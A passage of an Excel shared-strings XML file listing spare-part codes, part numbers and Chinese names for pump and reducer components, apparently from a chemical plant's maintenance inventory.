    <t>4M16B-25-6</t>
  </si>
  <si>
    <t>07010962</t>
  </si>
  <si>
    <t>FWFP</t>
  </si>
  <si>
    <t>防污阀片</t>
  </si>
  <si>
    <t>210*50*6</t>
  </si>
  <si>
    <t>07010963</t>
  </si>
  <si>
    <t>TH1.6*17/20*26*8</t>
  </si>
  <si>
    <t>1.6*17/20*26*8</t>
  </si>
  <si>
    <t>07010963-1</t>
  </si>
  <si>
    <t>THM</t>
  </si>
  <si>
    <t>弹簧帽</t>
  </si>
  <si>
    <t>07010964</t>
  </si>
  <si>
    <t>HJZ2D16-3-4</t>
  </si>
  <si>
    <t>2D16-3-4</t>
  </si>
  <si>
    <t>07010965</t>
  </si>
  <si>
    <t>压筒</t>
  </si>
  <si>
    <t>07010968</t>
  </si>
  <si>
    <t>MFLM4M12-15-16</t>
  </si>
  <si>
    <t>密封螺帽</t>
  </si>
  <si>
    <t>4M12-15-16</t>
  </si>
  <si>
    <t>07010972</t>
  </si>
  <si>
    <t>QZ2A-16/32</t>
  </si>
  <si>
    <t>曲轴</t>
  </si>
  <si>
    <t>2A-16/32</t>
  </si>
  <si>
    <t>07010973</t>
  </si>
  <si>
    <t>JSQ2A-16/32</t>
  </si>
  <si>
    <t>07010975</t>
  </si>
  <si>
    <t>07010979</t>
  </si>
  <si>
    <t>SZT2D16A-5-00</t>
  </si>
  <si>
    <t>2D16A-5-00</t>
  </si>
  <si>
    <t>07020682</t>
  </si>
  <si>
    <t>JXMF200D43*3</t>
  </si>
  <si>
    <t>200D43*3</t>
  </si>
  <si>
    <t>07020683</t>
  </si>
  <si>
    <t>PHP200D43*3</t>
  </si>
  <si>
    <t>07020684</t>
  </si>
  <si>
    <t>PHH200D43*3</t>
  </si>
  <si>
    <t>07020685</t>
  </si>
  <si>
    <t>DYT200D43*3</t>
  </si>
  <si>
    <t>07020686</t>
  </si>
  <si>
    <t>MFH200D43*3</t>
  </si>
  <si>
    <t>07020689</t>
  </si>
  <si>
    <t>BZ200D43*3</t>
  </si>
  <si>
    <t>07020801</t>
  </si>
  <si>
    <t>JXMF</t>
  </si>
  <si>
    <t>小水解泵</t>
  </si>
  <si>
    <t>07020803</t>
  </si>
  <si>
    <t>YL80-50-200</t>
  </si>
  <si>
    <t>80-50-200</t>
  </si>
  <si>
    <t>07020804</t>
  </si>
  <si>
    <t>BZIHF80-50-200</t>
  </si>
  <si>
    <t>泵轴（带锁母）</t>
  </si>
  <si>
    <t>IHF80-50-200</t>
  </si>
  <si>
    <t>07020810</t>
  </si>
  <si>
    <t>JXMF108-45</t>
  </si>
  <si>
    <t>108-45</t>
  </si>
  <si>
    <t>07020821</t>
  </si>
  <si>
    <t>YLIH65-50-160</t>
  </si>
  <si>
    <t>07020823</t>
  </si>
  <si>
    <t>BZIH65-50-160</t>
  </si>
  <si>
    <t>07020824</t>
  </si>
  <si>
    <t>07020832</t>
  </si>
  <si>
    <t>BZIH40-32-250</t>
  </si>
  <si>
    <t>07020835</t>
  </si>
  <si>
    <t>LM</t>
  </si>
  <si>
    <t>07020837</t>
  </si>
  <si>
    <t>JXMF109-35</t>
  </si>
  <si>
    <t>109-35</t>
  </si>
  <si>
    <t>07020838</t>
  </si>
  <si>
    <t>LZQIN40-32-250</t>
  </si>
  <si>
    <t>IN40-32-250</t>
  </si>
  <si>
    <t>07020840</t>
  </si>
  <si>
    <t>07020850</t>
  </si>
  <si>
    <t>ZS大氨泵</t>
  </si>
  <si>
    <t>B170A8-1-01-01-00</t>
  </si>
  <si>
    <t>07020851</t>
  </si>
  <si>
    <t>DHB170A8-1-01-7</t>
  </si>
  <si>
    <t>B170A8-1-01-7</t>
  </si>
  <si>
    <t>07020853</t>
  </si>
  <si>
    <t>YH116*96*12</t>
  </si>
  <si>
    <t>压环</t>
  </si>
  <si>
    <t>116*96*12</t>
  </si>
  <si>
    <t>07020854</t>
  </si>
  <si>
    <t>DXT116*96*30</t>
  </si>
  <si>
    <t>116*96*30</t>
  </si>
  <si>
    <t>07020855</t>
  </si>
  <si>
    <t>MFQ116*96</t>
  </si>
  <si>
    <t>116*96</t>
  </si>
  <si>
    <t>07020857</t>
  </si>
  <si>
    <t>PYFZB170A2-1-13</t>
  </si>
  <si>
    <t>排液阀座</t>
  </si>
  <si>
    <t>B170A2-1-13</t>
  </si>
  <si>
    <t>07020858</t>
  </si>
  <si>
    <t>FXB170A2-1-3</t>
  </si>
  <si>
    <t>阀芯</t>
  </si>
  <si>
    <t>B170A2-1-3</t>
  </si>
  <si>
    <t>07020860</t>
  </si>
  <si>
    <t>d</t>
  </si>
  <si>
    <t>B170A2-1-9</t>
  </si>
  <si>
    <t>07020862</t>
  </si>
  <si>
    <t>DYGB170-10</t>
  </si>
  <si>
    <t>挡油盖</t>
  </si>
  <si>
    <t>B170-10</t>
  </si>
  <si>
    <t>07020863</t>
  </si>
  <si>
    <t>LKLC0301-04-00</t>
  </si>
  <si>
    <t>铝壳</t>
  </si>
  <si>
    <t>LC0301-04-00</t>
  </si>
  <si>
    <t>07020876</t>
  </si>
  <si>
    <t>FMFZJYG</t>
  </si>
  <si>
    <t>非密封组件压盖</t>
  </si>
  <si>
    <t>07020877</t>
  </si>
  <si>
    <t>FMFJSH</t>
  </si>
  <si>
    <t>非密封组件水环</t>
  </si>
  <si>
    <t>07020878</t>
  </si>
  <si>
    <t>LZQJFRB65-40-315</t>
  </si>
  <si>
    <t>07020881</t>
  </si>
  <si>
    <t>GYBJFRB65-40-315</t>
  </si>
  <si>
    <t>隔液板</t>
  </si>
  <si>
    <t>07020882</t>
  </si>
  <si>
    <t>FYLJFRB65-40-315</t>
  </si>
  <si>
    <t>副叶轮</t>
  </si>
  <si>
    <t>07020883</t>
  </si>
  <si>
    <t>BZJFRB65-40-315</t>
  </si>
  <si>
    <t>07020884</t>
  </si>
  <si>
    <t>ZTJFRB65-40-315</t>
  </si>
  <si>
    <t>07020884-1</t>
  </si>
  <si>
    <t>07020885</t>
  </si>
  <si>
    <t>CZ100-250</t>
  </si>
  <si>
    <t>07020886</t>
  </si>
  <si>
    <t>JXMF108-55</t>
  </si>
  <si>
    <t>108-55</t>
  </si>
  <si>
    <t>07020888</t>
  </si>
  <si>
    <t>YLCZ100-250</t>
  </si>
  <si>
    <t>07020890</t>
  </si>
  <si>
    <t>07020891</t>
  </si>
  <si>
    <t>MFYG</t>
  </si>
  <si>
    <t>密封压盖</t>
  </si>
  <si>
    <t>07020892</t>
  </si>
  <si>
    <t>RG</t>
  </si>
  <si>
    <t>软管</t>
  </si>
  <si>
    <t>07021002</t>
  </si>
  <si>
    <t>JXMFMC/35-G60</t>
  </si>
  <si>
    <t>MC/35-G60</t>
  </si>
  <si>
    <t>07021010</t>
  </si>
  <si>
    <t>07021011</t>
  </si>
  <si>
    <t>JXMFMG1/50-G60</t>
  </si>
  <si>
    <t>MG1/50-G60</t>
  </si>
  <si>
    <t>07021020</t>
  </si>
  <si>
    <t>YLKQSN-300-M4/618</t>
  </si>
  <si>
    <t>07021021</t>
  </si>
  <si>
    <t>JXMFKQSN300-M4-618</t>
  </si>
  <si>
    <t>KQSN300-M4-618</t>
  </si>
  <si>
    <t>07021022</t>
  </si>
  <si>
    <t>ZTKQSN300</t>
  </si>
  <si>
    <t>KQSN300</t>
  </si>
  <si>
    <t>07021023</t>
  </si>
  <si>
    <t>ZKQSN300</t>
  </si>
  <si>
    <t>07021024</t>
  </si>
  <si>
    <t>MFHKQSN300-M4/618</t>
  </si>
  <si>
    <t>07021030</t>
  </si>
  <si>
    <t>ZT 80AFB-60</t>
  </si>
  <si>
    <t>07021032</t>
  </si>
  <si>
    <t>BZ80AFB-60</t>
  </si>
  <si>
    <t>07021050</t>
  </si>
  <si>
    <t>ZTKQDL65-16</t>
  </si>
  <si>
    <t>KQDL65-16</t>
  </si>
  <si>
    <t>07021063</t>
  </si>
  <si>
    <t>ZCCTKQSN500-M12/470</t>
  </si>
  <si>
    <t>轴承衬套</t>
  </si>
  <si>
    <t>KQSN500-M12/470</t>
  </si>
  <si>
    <t>07021065</t>
  </si>
  <si>
    <t>ZCDT</t>
  </si>
  <si>
    <t>轴承挡套</t>
  </si>
  <si>
    <t>M12/470</t>
  </si>
  <si>
    <t>07021066</t>
  </si>
  <si>
    <t>BZ蒸汽冷凝液泵</t>
  </si>
  <si>
    <t>07021067</t>
  </si>
  <si>
    <t>YLKQWH100-250</t>
  </si>
  <si>
    <t>07021070</t>
  </si>
  <si>
    <t>ZCTKQSN500-M12/470</t>
  </si>
  <si>
    <t>07021277</t>
  </si>
  <si>
    <t>YB</t>
  </si>
  <si>
    <t>油标</t>
  </si>
  <si>
    <t>07021281</t>
  </si>
  <si>
    <t>PYFZ3DP1-1-9</t>
  </si>
  <si>
    <t>3DP1-1-9</t>
  </si>
  <si>
    <t>07021282</t>
  </si>
  <si>
    <t>PYTH3DP1-1-6A</t>
  </si>
  <si>
    <t>排液弹簧</t>
  </si>
  <si>
    <t>3DP1-1-6A</t>
  </si>
  <si>
    <t>07021283</t>
  </si>
  <si>
    <t>FP3DP1-1-8</t>
  </si>
  <si>
    <t>3DP1-1-8</t>
  </si>
  <si>
    <t>07021284</t>
  </si>
  <si>
    <t>OXQ</t>
  </si>
  <si>
    <t>07021285</t>
  </si>
  <si>
    <t>ZS</t>
  </si>
  <si>
    <t>07021285-1</t>
  </si>
  <si>
    <t>3ZH75-1-70-01</t>
  </si>
  <si>
    <t>07021286</t>
  </si>
  <si>
    <t>82*70*6</t>
  </si>
  <si>
    <t>07021287</t>
  </si>
  <si>
    <t>DXT82*70*15</t>
  </si>
  <si>
    <t>82*70*15</t>
  </si>
  <si>
    <t>07021288</t>
  </si>
  <si>
    <t>隔圏</t>
  </si>
  <si>
    <t>07021291</t>
  </si>
  <si>
    <t>CT3ZH75-1-20</t>
  </si>
  <si>
    <t>3ZH75-1-20</t>
  </si>
  <si>
    <t>07021292</t>
  </si>
  <si>
    <t>FZ 3DP60-ZL1-03</t>
  </si>
  <si>
    <t>阀罩</t>
  </si>
  <si>
    <t>3DP60-ZL1-03</t>
  </si>
  <si>
    <t>07021294</t>
  </si>
  <si>
    <t>TLH</t>
  </si>
  <si>
    <t>填料函</t>
  </si>
  <si>
    <t>07021297</t>
  </si>
  <si>
    <t>连杆（带螺栓）</t>
  </si>
  <si>
    <t>3ZH75.100-1-04</t>
  </si>
  <si>
    <t>07021309</t>
  </si>
  <si>
    <t>PHHZGC-5*2</t>
  </si>
  <si>
    <t>ZGC-5*2</t>
  </si>
  <si>
    <t>07021310</t>
  </si>
  <si>
    <t>ZCTJYZGC-5*2</t>
  </si>
  <si>
    <t>轴承体甲乙</t>
  </si>
  <si>
    <t>07021311</t>
  </si>
  <si>
    <t>07021312</t>
  </si>
  <si>
    <t>PHPZGC-5*2</t>
  </si>
  <si>
    <t>07021322</t>
  </si>
  <si>
    <t>BZIH65-40-200</t>
  </si>
  <si>
    <t>07021326</t>
  </si>
  <si>
    <t>OXQIH65-40-200</t>
  </si>
  <si>
    <t>07021328</t>
  </si>
  <si>
    <t>DJHIH65-40-200</t>
  </si>
  <si>
    <t>动静环</t>
  </si>
  <si>
    <t>07021329</t>
  </si>
  <si>
    <t>ZTIH65-40-200</t>
  </si>
  <si>
    <t>07021330</t>
  </si>
  <si>
    <t>YLIH65-40-200</t>
  </si>
  <si>
    <t>07021332</t>
  </si>
  <si>
    <t>MFHIH65-40-200</t>
  </si>
  <si>
    <t>07021338</t>
  </si>
  <si>
    <t>MFHIH80-50-200</t>
  </si>
  <si>
    <t>IH80-50-200</t>
  </si>
  <si>
    <t>07021340</t>
  </si>
  <si>
    <t>DJHIH80-50-200</t>
  </si>
  <si>
    <t>07021342</t>
  </si>
  <si>
    <t>MFQIH80-50-200</t>
  </si>
  <si>
    <t>07021701</t>
  </si>
  <si>
    <t>DWT旧尿素一甲泵</t>
  </si>
  <si>
    <t>定位套</t>
  </si>
  <si>
    <t>旧尿素一甲泵</t>
  </si>
  <si>
    <t>07021702</t>
  </si>
  <si>
    <t>XLH3WJ1-3-02-21</t>
  </si>
  <si>
    <t>泄漏环</t>
  </si>
  <si>
    <t>3WJ1-3-02-21</t>
  </si>
  <si>
    <t>07021703</t>
  </si>
  <si>
    <t>LM3WJ1-3-01B-2</t>
  </si>
  <si>
    <t>3WJ1-3-01B-2</t>
  </si>
  <si>
    <t>07021705</t>
  </si>
  <si>
    <t>BLZQ</t>
  </si>
  <si>
    <t>半联轴器</t>
  </si>
  <si>
    <t>LC0301-04-5/60*105</t>
  </si>
  <si>
    <t>07021706</t>
  </si>
  <si>
    <t>PYFG</t>
  </si>
  <si>
    <t>排液阀盖</t>
  </si>
  <si>
    <t>07021707</t>
  </si>
  <si>
    <t>07021708</t>
  </si>
  <si>
    <t>FZ3W-J1-3-01B-8</t>
  </si>
  <si>
    <t>3W-J1-3-01B-8</t>
  </si>
  <si>
    <t>07021709</t>
  </si>
  <si>
    <t>DH</t>
  </si>
  <si>
    <t>07021710</t>
  </si>
  <si>
    <t>DXT3W-J1-3-02-26</t>
  </si>
  <si>
    <t>3W-J1-3-02-26</t>
  </si>
  <si>
    <t>07021711</t>
  </si>
  <si>
    <t>NLD140*124*10</t>
  </si>
  <si>
    <t>尼龙垫</t>
  </si>
  <si>
    <t>140*124*10</t>
  </si>
  <si>
    <t>07021712</t>
  </si>
  <si>
    <t>DJ1-3-20</t>
  </si>
  <si>
    <t>J1-3-20</t>
  </si>
  <si>
    <t>07021713</t>
  </si>
  <si>
    <t>GQ110*85*6</t>
  </si>
  <si>
    <t>110*85*6</t>
  </si>
  <si>
    <t>07021714</t>
  </si>
  <si>
    <t>DJ1-3-23</t>
  </si>
  <si>
    <t>J1-3-23</t>
  </si>
  <si>
    <t>07021715</t>
  </si>
  <si>
    <t>BDJ1-3-02-23</t>
  </si>
  <si>
    <t>背垫</t>
  </si>
  <si>
    <t>J1-3-02-23</t>
  </si>
  <si>
    <t>07021716</t>
  </si>
  <si>
    <t>DHJ1-3-02-4</t>
  </si>
  <si>
    <t>J1-3-02-4</t>
  </si>
  <si>
    <t>07021717</t>
  </si>
  <si>
    <t>THJ1-3-01B</t>
  </si>
  <si>
    <t>J1-3-01B</t>
  </si>
  <si>
    <t>07021718</t>
  </si>
  <si>
    <t>DJ1-3-7</t>
  </si>
  <si>
    <t>J1-3-7</t>
  </si>
  <si>
    <t>07021719</t>
  </si>
  <si>
    <t>BLZQJ1-7-17</t>
  </si>
  <si>
    <t>J1-7-17</t>
  </si>
  <si>
    <t>07021720</t>
  </si>
  <si>
    <t>MFQ110*85</t>
  </si>
  <si>
    <t>110*85</t>
  </si>
  <si>
    <t>07021721</t>
  </si>
  <si>
    <t>YLF3DJA10-22-5-6</t>
  </si>
  <si>
    <t>溢流阀</t>
  </si>
  <si>
    <t>3DJA10-22-5-6</t>
  </si>
  <si>
    <t>07021722</t>
  </si>
  <si>
    <t>ZSJ1-3-02-1</t>
  </si>
  <si>
    <t>J1-3-02-1</t>
  </si>
  <si>
    <t>07021724</t>
  </si>
  <si>
    <t>KH1</t>
  </si>
  <si>
    <t>1</t>
  </si>
  <si>
    <t>07021725</t>
  </si>
  <si>
    <t>KH2</t>
  </si>
  <si>
    <t>2</t>
  </si>
  <si>
    <t>07021726</t>
  </si>
  <si>
    <t>KH3</t>
  </si>
  <si>
    <t>3</t>
  </si>
  <si>
    <t>07021727</t>
  </si>
  <si>
    <t>TZLMJ1-3-02-2</t>
  </si>
  <si>
    <t>调整螺母</t>
  </si>
  <si>
    <t>J1-3-02-2</t>
  </si>
  <si>
    <t>07021729</t>
  </si>
  <si>
    <t>07021730</t>
  </si>
  <si>
    <t>YBBC-6</t>
  </si>
  <si>
    <t>BC-6</t>
  </si>
  <si>
    <t>07021731</t>
  </si>
  <si>
    <t>DHJ1-3-02-28</t>
  </si>
  <si>
    <t>J1-3-02-28</t>
  </si>
  <si>
    <t>07021733</t>
  </si>
  <si>
    <t>ZHF3WJ1-3-01B-00</t>
  </si>
  <si>
    <t>3WJ1-3-01B-00</t>
  </si>
  <si>
    <t>07021736</t>
  </si>
  <si>
    <t>FG3W-J1-3-01B-1</t>
  </si>
  <si>
    <t>阀杆</t>
  </si>
  <si>
    <t>3W-J1-3-01B-1</t>
  </si>
  <si>
    <t>07021801</t>
  </si>
  <si>
    <t>CXSH旧尿素氨水泵</t>
  </si>
  <si>
    <t>冲洗水环</t>
  </si>
  <si>
    <t>旧尿素氨水泵</t>
  </si>
  <si>
    <t>07021802</t>
  </si>
  <si>
    <t>D3DJ2/2.4-2</t>
  </si>
  <si>
    <t>3DJ2/2.4-2</t>
  </si>
  <si>
    <t>07021803</t>
  </si>
  <si>
    <t>D3DJ2/2.4-3-5</t>
  </si>
  <si>
    <t>3DJ2/2.4-3-5</t>
  </si>
  <si>
    <t>07021804</t>
  </si>
  <si>
    <t>D3DJ2/2.4-3-7</t>
  </si>
  <si>
    <t>3DJ2/2.4-3-7</t>
  </si>
  <si>
    <t>07021805</t>
  </si>
  <si>
    <t>TL52*32*10</t>
  </si>
  <si>
    <t>52*32*10</t>
  </si>
  <si>
    <t>07021807</t>
  </si>
  <si>
    <t>MFQ3DJ2/2.4-3-01-4</t>
  </si>
  <si>
    <t>3DJ2/2.4-3-01-4</t>
  </si>
  <si>
    <t>07021808</t>
  </si>
  <si>
    <t>FZ3DJ2/2.4-3-6</t>
  </si>
  <si>
    <t>3DJ2/2.4-3-6</t>
  </si>
  <si>
    <t>07021809</t>
  </si>
  <si>
    <t>XFT3DJ2/2.4-3-20</t>
  </si>
  <si>
    <t>下阀套</t>
  </si>
  <si>
    <t>3DJ2/2.4-3-20</t>
  </si>
  <si>
    <t>07021811</t>
  </si>
  <si>
    <t>07021812</t>
  </si>
  <si>
    <t>07021813</t>
  </si>
  <si>
    <t>TJLM3DJ2/2.4-3-01-2</t>
  </si>
  <si>
    <t>3DJ2/2.4-3-01-2</t>
  </si>
  <si>
    <t>07021814</t>
  </si>
  <si>
    <t>JYFZ3DJ2/2.4-3-19</t>
  </si>
  <si>
    <t>3DJ2/2.4-3-19</t>
  </si>
  <si>
    <t>07021815</t>
  </si>
  <si>
    <t>J/PYFP</t>
  </si>
  <si>
    <t>进/排液阀片</t>
  </si>
  <si>
    <t>07021901</t>
  </si>
  <si>
    <t>DXF旧尿素液氨泵</t>
  </si>
  <si>
    <t>单向阀</t>
  </si>
  <si>
    <t>旧尿素液氨泵</t>
  </si>
  <si>
    <t>07021902</t>
  </si>
  <si>
    <t>FZLF30TB-01-2</t>
  </si>
  <si>
    <t>LF30TB-01-2</t>
  </si>
  <si>
    <t>07021903</t>
  </si>
  <si>
    <t>FG3W-A4-3-03A-4</t>
  </si>
  <si>
    <t>3W-A4-3-03A-4</t>
  </si>
  <si>
    <t>07021904</t>
  </si>
  <si>
    <t>LGQMD3W-22B-1-08-00</t>
  </si>
  <si>
    <t>连杆球面垫</t>
  </si>
  <si>
    <t>3W-22B-1-08-00</t>
  </si>
  <si>
    <t>07021908</t>
  </si>
  <si>
    <t>TJLMA4-3-01-2</t>
  </si>
  <si>
    <t>A4-3-01-2</t>
  </si>
  <si>
    <t>07021909</t>
  </si>
  <si>
    <t>FBA4-3-03-2</t>
  </si>
  <si>
    <t>A4-3-03-2</t>
  </si>
  <si>
    <t>07021910</t>
  </si>
  <si>
    <t>ZDDQ22B-1-36</t>
  </si>
  <si>
    <t>22B-1-36</t>
  </si>
  <si>
    <t>07021911</t>
  </si>
  <si>
    <t>DH22B-1-51</t>
  </si>
  <si>
    <t>22B-1-51</t>
  </si>
  <si>
    <t>07021913</t>
  </si>
  <si>
    <t>SZT22B-1-03-00</t>
  </si>
  <si>
    <t>22B-1-03-00</t>
  </si>
  <si>
    <t>07021914</t>
  </si>
  <si>
    <t>DA4-3-5</t>
  </si>
  <si>
    <t>A4-3-5</t>
  </si>
  <si>
    <t>07021915</t>
  </si>
  <si>
    <t>DA4-3-26</t>
  </si>
  <si>
    <t>A4-3-26</t>
  </si>
  <si>
    <t>07021916</t>
  </si>
  <si>
    <t>THA4-3-03-3</t>
  </si>
  <si>
    <t>A4-3-03-3</t>
  </si>
  <si>
    <t>07021919</t>
  </si>
  <si>
    <t>SFT</t>
  </si>
  <si>
    <t>上阀套</t>
  </si>
  <si>
    <t>07021920</t>
  </si>
  <si>
    <t>GLQA7-2-5</t>
  </si>
  <si>
    <t>A7-2-5</t>
  </si>
  <si>
    <t>07021921</t>
  </si>
  <si>
    <t>ZW22B-5-6</t>
  </si>
  <si>
    <t>22B-5-6</t>
  </si>
  <si>
    <t>07021922</t>
  </si>
  <si>
    <t>GLQW40*180-J</t>
  </si>
  <si>
    <t>W40*180-J</t>
  </si>
  <si>
    <t>07021923</t>
  </si>
  <si>
    <t>LXXY-25*100-7</t>
  </si>
  <si>
    <t>XY-25*100-7</t>
  </si>
  <si>
    <t>07021924</t>
  </si>
  <si>
    <t>OXQ85*5.7</t>
  </si>
  <si>
    <t>85*5.7</t>
  </si>
  <si>
    <t>07021925</t>
  </si>
  <si>
    <t>ZSA7-3-01-1-1KB</t>
  </si>
  <si>
    <t>A7-3-01-1-1KB</t>
  </si>
  <si>
    <t>07021926</t>
  </si>
  <si>
    <t>DXTA7-3-01-5KB</t>
  </si>
  <si>
    <t>A7-3-01-5KB</t>
  </si>
  <si>
    <t>07021927</t>
  </si>
  <si>
    <t>BDA7-3-01-10KB</t>
  </si>
  <si>
    <t>A7-3-01-10KB</t>
  </si>
  <si>
    <t>07021928</t>
  </si>
  <si>
    <t>DHA7-3-01-8KB</t>
  </si>
  <si>
    <t>A7-3-01-8KB</t>
  </si>
  <si>
    <t>07021929</t>
  </si>
  <si>
    <t>DHA7-3-01-11KB</t>
  </si>
  <si>
    <t>A7-3-01-11KB</t>
  </si>
  <si>
    <t>07021930</t>
  </si>
  <si>
    <t>MFQ108*88*10</t>
  </si>
  <si>
    <t>108*88*10</t>
  </si>
  <si>
    <t>07021931</t>
  </si>
  <si>
    <t>NLD120*101*10</t>
  </si>
  <si>
    <t>120*101*10</t>
  </si>
  <si>
    <t>07021932</t>
  </si>
  <si>
    <t>JYJGBJ</t>
  </si>
  <si>
    <t>进油接管部件</t>
  </si>
  <si>
    <t>07022001</t>
  </si>
  <si>
    <t>ZS旧尿素冲洗水泵</t>
  </si>
  <si>
    <t>旧尿素冲洗水泵</t>
  </si>
  <si>
    <t>07022002</t>
  </si>
  <si>
    <t>FP3DZY-1-02-3</t>
  </si>
  <si>
    <t>3DZY-1-02-3</t>
  </si>
  <si>
    <t>07022003</t>
  </si>
  <si>
    <t>DH3DZY-1-6</t>
  </si>
  <si>
    <t>3DZY-1-6</t>
  </si>
  <si>
    <t>07022004</t>
  </si>
  <si>
    <t>MFQ3DZY-1-01-5</t>
  </si>
  <si>
    <t>3DZY-1-01-5</t>
  </si>
  <si>
    <t>07022005</t>
  </si>
  <si>
    <t>LG160-1-01-00</t>
  </si>
  <si>
    <t>160-1-01-00</t>
  </si>
  <si>
    <t>07022006</t>
  </si>
  <si>
    <t>TJLM3DZY-1-01-2</t>
  </si>
  <si>
    <t>3DZY-1-01-2</t>
  </si>
  <si>
    <t>07022007</t>
  </si>
  <si>
    <t>SZT160-1-9</t>
  </si>
  <si>
    <t>160-1-9</t>
  </si>
  <si>
    <t>07022008</t>
  </si>
  <si>
    <t>DWT160-1-6</t>
  </si>
  <si>
    <t>160-1-6</t>
  </si>
  <si>
    <t>07022009</t>
  </si>
  <si>
    <t>FT3DZY-1-03-2</t>
  </si>
  <si>
    <t>阀套</t>
  </si>
  <si>
    <t>3DZY-1-03-2</t>
  </si>
  <si>
    <t>07022101</t>
  </si>
  <si>
    <t>EJZXL旧尿素减速机</t>
  </si>
  <si>
    <t>二级中心轮</t>
  </si>
  <si>
    <t>旧尿素减速机</t>
  </si>
  <si>
    <t>07022102</t>
  </si>
  <si>
    <t>TJFLF601-00</t>
  </si>
  <si>
    <t>LF601-00</t>
  </si>
  <si>
    <t>07022103</t>
  </si>
  <si>
    <t>ZDL1L15-1-6</t>
  </si>
  <si>
    <t>止挡</t>
  </si>
  <si>
    <t>L1L15-1-6</t>
  </si>
  <si>
    <t>07022104</t>
  </si>
  <si>
    <t>DHL1L15-1-10</t>
  </si>
  <si>
    <t>L1L15-1-10</t>
  </si>
  <si>
    <t>07022105</t>
  </si>
  <si>
    <t>DXGL1L15-1-34</t>
  </si>
  <si>
    <t>定向杆</t>
  </si>
  <si>
    <t>L1L15-1-34</t>
  </si>
  <si>
    <t>07022107</t>
  </si>
  <si>
    <t>DHL1L15-1-28</t>
  </si>
  <si>
    <t>L1L15-1-28</t>
  </si>
  <si>
    <t>07022108</t>
  </si>
  <si>
    <t>DLC0301-09-2</t>
  </si>
  <si>
    <t>LC0301-09-2</t>
  </si>
  <si>
    <t>07022110</t>
  </si>
  <si>
    <t>YJZXLL1L15-1-41</t>
  </si>
  <si>
    <t>一级中心轮</t>
  </si>
  <si>
    <t>L1L15-1-41</t>
  </si>
  <si>
    <t>07022302</t>
  </si>
  <si>
    <t>YL循环机350S-75B</t>
  </si>
  <si>
    <t>循环机350S-75B</t>
  </si>
  <si>
    <t>07022303</t>
  </si>
  <si>
    <t>ZT循环机350S-75B</t>
  </si>
  <si>
    <t>07022306</t>
  </si>
  <si>
    <t>ZCH循环机350S-75B</t>
  </si>
  <si>
    <t>轴承盒</t>
  </si>
  <si>
    <t>07022307</t>
  </si>
  <si>
    <t>KH循环机350S-75B</t>
  </si>
  <si>
    <t>07022309</t>
  </si>
  <si>
    <t>Z循环机350S-75B</t>
  </si>
  <si>
    <t>07022311</t>
  </si>
  <si>
    <t>SMTLH90*121*10</t>
  </si>
  <si>
    <t>石墨填料环</t>
  </si>
  <si>
    <t>90*121*10</t>
  </si>
  <si>
    <t>07022312</t>
  </si>
  <si>
    <t>YLM循环机350S-75B</t>
  </si>
  <si>
    <t>圆螺母</t>
  </si>
  <si>
    <t>07022313</t>
  </si>
  <si>
    <t>TLH350S-75B</t>
  </si>
  <si>
    <t>07022314</t>
  </si>
  <si>
    <t>BDLQ循环机350S-75B</t>
  </si>
  <si>
    <t>泵电联器</t>
  </si>
  <si>
    <t>07022401</t>
  </si>
  <si>
    <t>JXMF熔融泵</t>
  </si>
  <si>
    <t>07022402</t>
  </si>
  <si>
    <t>ZTIN50-32-250</t>
  </si>
  <si>
    <t>IN50-32-250</t>
  </si>
  <si>
    <t>07022403</t>
  </si>
  <si>
    <t>LZQIH50-32-250</t>
  </si>
  <si>
    <t>07022404</t>
  </si>
  <si>
    <t>BZIN50-32-250</t>
  </si>
  <si>
    <t>07022411</t>
  </si>
  <si>
    <t>SSH熔融泵</t>
  </si>
  <si>
    <t>甩水环</t>
  </si>
  <si>
    <t>07022414</t>
  </si>
  <si>
    <t>MFQ65RB-40-250</t>
  </si>
  <si>
    <t>65RB-40-250</t>
  </si>
  <si>
    <t>07022415</t>
  </si>
  <si>
    <t>BG65RB-40-250</t>
  </si>
  <si>
    <t>07022416</t>
  </si>
  <si>
    <t>Z65RB-40-250</t>
  </si>
  <si>
    <t>07022417</t>
  </si>
  <si>
    <t>GB65RB-40-250</t>
  </si>
  <si>
    <t>隔板</t>
  </si>
  <si>
    <t>07022419</t>
  </si>
  <si>
    <t>ZT65RB-40-250</t>
  </si>
  <si>
    <t>07022420</t>
  </si>
  <si>
    <t>LM65RB-40-250</t>
  </si>
  <si>
    <t>07022421</t>
  </si>
  <si>
    <t>YL65RB-40-250</t>
  </si>
  <si>
    <t>07022424</t>
  </si>
  <si>
    <t>BZJINB65-40-250</t>
  </si>
  <si>
    <t>07022425</t>
  </si>
  <si>
    <t>YLJINB65-40-250</t>
  </si>
  <si>
    <t>07022426</t>
  </si>
  <si>
    <t>JXMF108-50</t>
  </si>
  <si>
    <t>108-50</t>
  </si>
  <si>
    <t>07022428</t>
  </si>
  <si>
    <t>BGJINB65-40-250</t>
  </si>
  <si>
    <t>07022434</t>
  </si>
  <si>
    <t>JFND-25*30*8</t>
  </si>
  <si>
    <t>07022437</t>
  </si>
  <si>
    <t>JXMFD25-50*5</t>
  </si>
  <si>
    <t>D25-50*5</t>
  </si>
  <si>
    <t>07022437-1</t>
  </si>
  <si>
    <t>ZTJY</t>
  </si>
  <si>
    <t>轴套甲/乙</t>
  </si>
  <si>
    <t>07022438</t>
  </si>
  <si>
    <t>JXMFD12-50*5</t>
  </si>
  <si>
    <t>D12-50*5</t>
  </si>
  <si>
    <t>07022438-1</t>
  </si>
  <si>
    <t>SYHD12-50*5</t>
  </si>
  <si>
    <t>甩油环</t>
  </si>
  <si>
    <t>07022438-2</t>
  </si>
  <si>
    <t>ZYZT</t>
  </si>
  <si>
    <t>左/右轴套</t>
  </si>
  <si>
    <t>07022438-4</t>
  </si>
  <si>
    <t>ZCYG</t>
  </si>
  <si>
    <t>07022438-6</t>
  </si>
  <si>
    <t>LQSZ</t>
  </si>
  <si>
    <t>冷却水嘴</t>
  </si>
  <si>
    <t>07022441</t>
  </si>
  <si>
    <t>JXMFJINB125-100-250</t>
  </si>
  <si>
    <t>07022442</t>
  </si>
  <si>
    <t>ZTJINB125-100-250</t>
  </si>
  <si>
    <t>07022443</t>
  </si>
  <si>
    <t>YLJINB125-100-250</t>
  </si>
  <si>
    <t>07022444</t>
  </si>
  <si>
    <t>BZJINB125-100-250</t>
  </si>
  <si>
    <t>07022450</t>
  </si>
  <si>
    <t>BZJFRB65-40-250</t>
  </si>
  <si>
    <t>JFRB65-40-250</t>
  </si>
  <si>
    <t>07022453</t>
  </si>
  <si>
    <t>SXYLJFRB65-40-250</t>
  </si>
  <si>
    <t>双吸叶轮</t>
  </si>
  <si>
    <t>07022472</t>
  </si>
  <si>
    <t>152-35</t>
  </si>
